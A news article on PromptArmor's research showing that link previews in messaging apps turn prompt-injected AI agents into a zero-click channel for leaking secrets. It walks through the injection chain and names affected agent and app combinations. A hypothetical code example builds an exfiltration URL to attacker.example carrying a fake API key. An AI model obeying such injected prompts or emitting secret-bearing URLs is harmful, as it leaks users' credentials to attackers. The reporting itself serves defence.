AI agents spill secrets just by previewing malicious links
AI agents can shop for you, program for you, and, if you're feeling bold, chat for you in a messaging app. But beware: attackers can use malicious prompts in chat to trick an AI agent into generating a data-leaking URL, which link previews may fetch automatically.
Messaging apps commonly use link previews, which let the app query links dropped in a message to extract a title, description, and thumbnail to display in place of a plain URL. As AI security firm PromptArmor discovered, link previews can turn attacker-controlled URLs generated by an AI agent into a zero-click data-exfiltration channel, leaking sensitive information without any user interaction.
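For a sense of why the preview fetch alone is enough, here's a minimal sketch in Python of what a preview fetcher does. It's purely illustrative - not any particular app's implementation - but it shows the key point: the fetcher requests the page to scrape Open Graph metadata, which means the full URL, query string and all, is handed to whoever runs the target server before anything is shown to a user.

```python
# Minimal sketch of what a link preview fetcher does. Purely illustrative -
# not any messaging app's actual implementation.
import re
import requests

def fetch_preview(url: str) -> dict:
    # This GET alone hands the full URL - query string included - to whoever
    # operates the target server, before any preview is displayed to a user.
    html = requests.get(url, timeout=5).text

    def og(prop: str) -> str | None:
        # Scrape Open Graph metadata (og:title, og:description, og:image).
        pattern = rf'<meta[^>]+property=["\']og:{prop}["\'][^>]+content=["\']([^"\']*)["\']'
        match = re.search(pattern, html, re.IGNORECASE)
        return match.group(1) if match else None

    return {"title": og("title"), "description": og("description"), "image": og("image")}

print(fetch_preview("https://example.com/"))
```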
As PromptArmor notes in its report, indirect prompt injection via malicious links isn't unheard of, but typically requires the victim to click a link after an AI system has been tricked into appending sensitive user data to an attacker-controlled URL. When the same technique is used against an AI agent operating inside messaging platforms such as Slack or Telegram, where link previews are enabled by default or in certain configurations, the problem gets a whole lot worse.
"In agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link," PromptArmor explained.
Without a link preview, someone - the AI agent or a human operator - has to actually follow the link before the network request fires and the appended data reaches the attacker. The payload can be whatever the agent has access to: API keys, tokens, and other sensitive data the injected prompt tells it to tack onto the attacker-controlled URL.
Because a link preview pulls metadata from the target website, that whole attack chain can play out with zero interaction: once an AI agent has been tricked into generating a URL containing sensitive data, the preview system fetches it automatically. The outcome is the same as if the victim had clicked - the data-exposing URL, secrets and all, lands in the attacker's request log.
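To make that concrete, here's a purely hypothetical example of the sort of URL a tricked agent might emit. The domain, parameter name, and fake key are placeholders, not details from PromptArmor's report:

```python
# Hypothetical illustration of an exfiltration URL; nothing here is from the report.
from urllib.parse import quote

stolen_secret = "sk-live-EXAMPLE-key"   # whatever the injected prompt told the agent to grab
exfil_url = f"https://attacker.example/collect?d={quote(stolen_secret)}"
print(exfil_url)

# The moment the messaging app previews the agent's reply, its fetcher issues
# roughly "GET /collect?d=sk-live-EXAMPLE-key" against attacker.example,
# and the secret shows up in that server's access log without anyone clicking a thing.
```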
It won't shock you to learn that vibe-coded agentic AI disaster platform OpenClaw is vulnerable to this attack in its default Telegram configuration, something PromptArmor notes can be fixed with a change to OpenClaw's config file, as detailed in its report. Judging from the data PromptArmor provided, though, OpenClaw isn't the biggest offender.
The company created a website where users can test AI agents integrated into messaging apps to see whether they trigger insecure link previews. Based on reported results from those tests, Microsoft Teams accounts for the largest share of preview fetches, and in the logged cases, it is paired with Microsoft's own Copilot Studio. Other reported at-risk combinations include Discord with OpenClaw, Slack with Cursor Slackbot, Discord with BoltBot, Snapchat with SnapAI, and Telegram with OpenClaw.
Reported safer setups include the Claude app in Slack, OpenClaw running via WhatsApp, and OpenClaw deployed via Signal in Docker, if you really want to complicate things.
While this is ultimately a problem with how AI agents' output is fed through link previews, PromptArmor notes that fixing it will largely fall to the messaging apps themselves.
"It falls on communication apps to expose link preview preferences to developers, and agent developers to leverage the preferences provided," the security firm explained. "We'd like to see communication apps consider supporting custom link preview configurations on a chat/channel-specific basis to create LLM-safe channels."
Until that happens, consider this yet another warning against adding an AI agent into an environment where confidentiality is important. ®